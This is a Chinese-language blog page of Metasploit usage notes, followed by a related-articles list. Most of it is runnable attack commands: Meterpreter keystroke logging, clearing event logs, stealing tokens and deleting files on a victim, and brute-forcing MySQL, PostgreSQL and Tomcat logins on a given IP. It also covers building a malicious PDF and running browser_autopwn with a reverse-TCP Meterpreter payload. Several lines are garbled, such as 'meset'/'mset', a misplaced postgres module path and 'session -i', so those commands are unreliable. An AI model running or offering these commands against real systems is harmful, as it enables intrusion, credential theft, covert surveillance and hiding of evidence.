msfconsole的命令:
msfconsole
use module :这个命令允许你开始配置所选择的模块。
set optionname module :这个命令允许你为指定的模块配置不同的选项。
exploit :这个命令启动漏洞利用模块
run :这个命令启动非漏洞利用模块。
search module :这个命令允许你搜索独立模块。
help
exit


msfcli的命令:
msfcli
msfcli [PATH TO EXPLOIT] [options = value] :这是执行漏洞利用的语法。
msf -h


Meterpreter 执行实际的载荷分发和漏洞利用工作:
background :这个命令允许你在后台运行 Meterpreter 会话。这个命令也能为你带回MSF 提示符。
download :这个命令允许你从受害者机器中下载文件。
upload :这个命令允许你向受害者机器上传文件。
execute :这个命令允许你在受害者机器上运行命令。
shell :这个命令允许你在受害者机器上运行 Windows shell 提示符( 仅限于 Windows主机) 。
session -i :这个命令允许你在会话之间切换。


开始记录目标系统中用户的击键顺序:
keyscan_start

转储目标系统中用户的击键顺序。击键顺序会显示在屏幕上:
keyscan_dump

停止记录目标系统中用户的击键顺序。
keyscan_stop

删除目标系统中的文件。
del exploited.docx

清除目标系统中的事件日志。
clearav

展示运行进程的列表。
ps

杀掉受害者系统的指定进程,使用 kill [pid] 语法。
kill 6353

尝试偷取目标系统上的模拟令牌。
steal_token


msfconsole mysql
use auxiliary/scanner/mysql/mysql_login
show options
set RHOST 192.168.10.111
set user_file /root/Desktop/usernames.txt
set pass_file /root/Desktop/passwords.txt
exploit


msfconsole postgresql
use auxiliary/scanner/mysql/postgres_login
show options
set RHOST 192.168.10.111
set user_file /root/Desktop/usernames.txt
set pass_file /root/Desktop/passwords.txt
exploit


msfconsole tomcat
use auxiliary/scanner/http/tomcat_mgr_login
show options
PASS_FILE meset /usr/share/metasploit-framework/data/wordlists/ tomcat_mgr_default_pass.txt
USER_FILE mset /usr/share/metasploit-framework/data/wordlists/ tomcat_mgr_default_pass.txt
set RHOSTS 192.168.10.111
set RPORT 8180
exploit


msfconsole
msfconsole pdf
use exploit/windows/fileformat/adobe_pdf_embedded_exe
show options
set FILENAME evildocument.pdf
set INFILENAME /root/Desktop/willie.pdf
exploit


实现 browser_autopwn:
浏览器 Autopwn 是 Metasploit 提供的辅助模块,在受害者访问网页时,让你能够自动化对它
们的攻击。浏览器 Autopwn 在攻击之前指定客户端的指纹识别,也就是说他不会对 IE 7 尝试
利用 Firefox 的漏洞。基于它的浏览器判断,它决定最适于实施哪个漏洞利用。
msfconsole autopwn
use auxiliary/server/browser_autopwn
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.10.109
set URIPATH "filetypes"
exploit
Metasploit 会在 IP 地址 <http://[Provided IP Address]:8080> 处执行漏洞利用。
当访问者访问这个地址时, browser_autopwn 模块尝试连接用户的机器来建立远程会话。
如果成功的话,Meterpreter 会确认这个会话。使用会话命令来激活它:
session –I 1

msf、armitage的更多相关文章

  1. 形形色色的软件生命周期模型(4)——MSF、实用型

    摘要: 读大学时,我们曾经学习过不少软件生命周期模型,当时还不是很懂软件开发,你可能会觉得这些东西很新奇.在实际工作中,你会发现这些模型其实很难应用,与此同时你会接触到RUP.MSF等权威软件公司的生 ...

  2. Cobaltstrike、armitage联动

    i 春秋作家:fengzi 原文来自:Cobaltstrike.armitage联动 在使用Cobaltstrike的时候发现他在大型或者比较复杂的内网环境中,作为内网拓展以及红队工具使用时拓展能力有 ...

  3. 第一次亲密接触MSF

    第一次亲密接触MSF Metasploit Framework介绍 Metasploit是一款开源安全漏洞检测工具,附带数百个已知的软件漏洞,并保持频繁更新.被安全社区冠以“可以黑掉整个宇宙”之名的强 ...

  4. MSF基础攻击实践报告

    MSF基础攻击实践 MSF的六个模块:exploit,encoder,payload,aux,post,nops exploit——渗透攻击模块 测试者利用它来攻击一个系统,程序,或服务,以获得开发者 ...

  5. 现代软件工程 第七章 【MSF】练习与讨论

    7.7  移山开发方法——比TFS敏捷更精简 几个软件学院的学生来请教阿超,同学们自豪地说,我们要用全套TFS敏捷开发模式开发项目! 真的?阿超不敢相信. 同学: 对!我们要用全5个工作项类型 – 任 ...

  6. 2018-2019 2 20165203 《网络对抗技术》Exp5 MSF基础

    2018-2019 2 20165203 <网络对抗技术>Exp5 MSF基础 实验内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: ...

  7. Metasploit 笔记

    目录一.名词解释···································································· 3二.msf基础··············· ...

  8. 《Metasploit渗透测试魔鬼训练营》第一章读书笔记

    第1章 魔鬼训练营--初识Metasploit 20135301 1.1 什么是渗透测试 1.1.1 渗透测试的起源与定义 如果大家对军事感兴趣,会知道各国军队每年都会组织一些军事演习来锻炼军队的攻防 ...

  9. Cobalt Strike系列教程第一章:简介与安装

    Cobalt Strike是一款超级好用的渗透测试工具,拥有多种协议主机上线方式,集成了提权,凭据导出,端口转发,socket代理,office攻击,文件捆绑,钓鱼等多种功能.同时,Cobalt St ...

随机推荐

  1. kubectl get pods The connection to the server was refused - did you specify the rig

    1   主要是运行这个命令  alias kubectl='kubectl --kubeconfig=/etc/kubernetes/kubelet.conf'问题解决. 同时也用到如下命令: pas ...

  2. 5月8日上课笔记-浮动float

    IO文件复制 字符流(只能对文本文件进行操作) Reader Writer 字节流(对所有文件都能操作) InputStream OutputStream 一.浮动 边框弧度 border-radiu ...

  3. Windows下安装GCC

    1.GCC编译器的选择 Windows下最常见的安装GCC的方式有两种:Cygwin和MinGW.本文主要介绍MinGW的安装配置. 2.下载MinGW 下载地址:http://sourceforge ...

  4. 【Oracle】Oracle改变日志归档模式

    一.确认工作模式:   1.查询V$DATABASE      SQL>select log_mode from v$database;      归档日志:ARCHIVELOG     2.执 ...

  5. Rector模式

    讲到高性能IO绕不开Reactor模式,它是大多数IO相关组件如Netty.Redis在使用的IO模式,为什么需要这种模式,它是如何设计来解决高性能并发的呢? 最最原始的网络编程思路就是服务器用一个w ...

  6. python学习——练习题(8)

    """ 题目:输出 9*9 乘法口诀表. """ def answer1(): """ 自己用最普通的双重循环 ...

  7. angularjs 出现 “Possibly unhandled rejection: cancel ”错误

    Try adding this to your config. I had a similar is once and this workaround did the trick. app.confi ...

  8. 不可能的工作:在FBX模型导入脚本中生成模型的预置体

    #if UNITY_EDITOR using System.Collections; using System.Collections.Generic; using System.IO; using ...

  9. f.lux Ubuntu 下进行安装

    这几天在搞Ubuntu 看的是我眼睛特痛,于是查了一下,有Linux 版的f.lux 于是我就行了一番的安装. 步骤         命令行 1.             sudo add-apt-r ...

  10. Core1.1环境下,自己实现的一个简单的CRUD框架(反射实现)

    我实现了一个简单的EF框架,主要用于操纵数据库.实现了对数据库的基本操纵--CRUD 这是项目结构 这是一个 core 下的 DLL 写了一个数据库工厂,用于执行sql语句.调用sql语句工厂 写了一 ...